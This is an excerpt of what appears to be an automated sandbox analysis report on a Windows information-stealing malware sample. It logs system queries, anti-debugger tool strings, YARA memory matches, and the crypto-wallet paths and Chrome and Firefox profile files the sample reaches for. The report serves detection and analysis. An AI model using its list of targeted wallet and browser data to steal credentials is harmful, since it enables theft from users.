                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0419~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmlaunch.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\dllhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Code function: 27_2_00007DF4586D6448 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,27_2_00007DF4586D6448
Source: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exe Code function: 34_2_00007FF652A632D4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,34_2_00007FF652A632D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_05B754D6 NtQuerySystemInformation,malloc,NtQuerySystemInformation,RtlGetVersion,lstrcmpiW,CloseHandle,free,7_2_05B754D6
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OllyDbg.exe
Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lordpe.exe
Source: svchost.exe, 00000013.00000002.289527797661.0000000002F00000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: autoruns.exe

                      Stealing of Sensitive Information

Source: Yara match File source: 00000007.00000002.289414206371.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.289413915589.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.289527976273.0000000003000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.289417352866.00000000054B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.289412154173.0000000002F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.289410202861.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000003.289410380457.0000000002BC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.289414206371.0000000003453000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.289414109956.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.289418154368.0000000005750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: svchost.exe, 0000001B.00000003.289631562126.0000018CD56DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\ElectrumSV\config
Source: svchost.exe, 0000001B.00000003.289631562126.0000018CD56DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\ElectronCash\config
Source: svchost.exe, 0000001B.00000003.289716143977.0000018CD5627000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: y.jaxx
Source: svchost.exe, 0000001B.00000003.289714781645.0000018CD56CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: svchost.exe, 0000001B.00000003.289714781645.0000018CD56CA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Exodus
Source: svchost.exe, 0000001B.00000003.289714142333.0000018CD2BFC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000003.00000002.289647160758.0000029A437D0000.00000004.08000000.00040000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\safebrowsing
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\entries
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\jfrd00o7.default
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\settings\main\ms-language-packs
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\26df2f0d-7481-455a-ad55-489185b726d6
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\settings\main\ms-language-packs\browser\newtab
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\settings\main
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\thumbnails
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cache2\doomed
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Safe Browsing Network
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\settings
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext
Source: C:\Windows\System32\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
